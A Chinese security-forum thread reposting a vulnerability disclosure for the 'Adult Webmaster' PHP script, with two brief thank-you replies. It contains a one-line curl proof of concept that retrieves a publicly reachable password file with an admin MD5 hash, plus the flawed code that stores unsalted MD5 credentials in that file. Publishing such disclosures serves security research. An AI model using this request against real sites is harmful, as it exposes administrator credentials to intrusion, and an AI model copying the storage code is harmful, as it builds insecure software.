搜索
查看: 717|回复: 2

Adult Webmaster PHP密码泄露漏洞

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-2-3 07:51:43 | 显示全部楼层 |阅读模式
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
[1] Administrative Credential Disclosure

PoC:

root@kali:/# curl http://localhost/home/caspers/public_html/demo/admin/userpwdadfasdfre.txt

admin:3a4ebf16a4795ad258e5408bae7be341

#

Vulnerable Code:
[+] admin/common.php

  1.         // Check user existance
  2.         $pfile = fopen("userpwdadfasdfre.txt","a+");
  3.     rewind($pfile);

  4.     while (!feof($pfile)) {
  5.         $line = fgets($pfile);
  6.         $tmp = explode(':', $line);
  7.         if ($tmp[0] == $user) {
  8.             $errorText = "The selected user name is taken!";
  9.             break;
  10.         }
  11.     }

  12.     // If everything is OK -> store user data
  13.     if ($errorText == ''){
  14.                 // Secure password string
  15.                 $userpass = md5($pass1);

  16.                 fwrite($pfile, "\r\n$user:$userpass");
  17.     }

  18.     fclose($pfile);
复制代码
过段时间可能会取消签到功能了
854955425 该用户已被删除
发表于 2014-2-3 08:16:53 | 显示全部楼层
不错不错,楼主您辛苦了。。。
854955425 该用户已被删除
发表于 2014-2-3 08:32:06 | 显示全部楼层
路过,支持一下啦
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表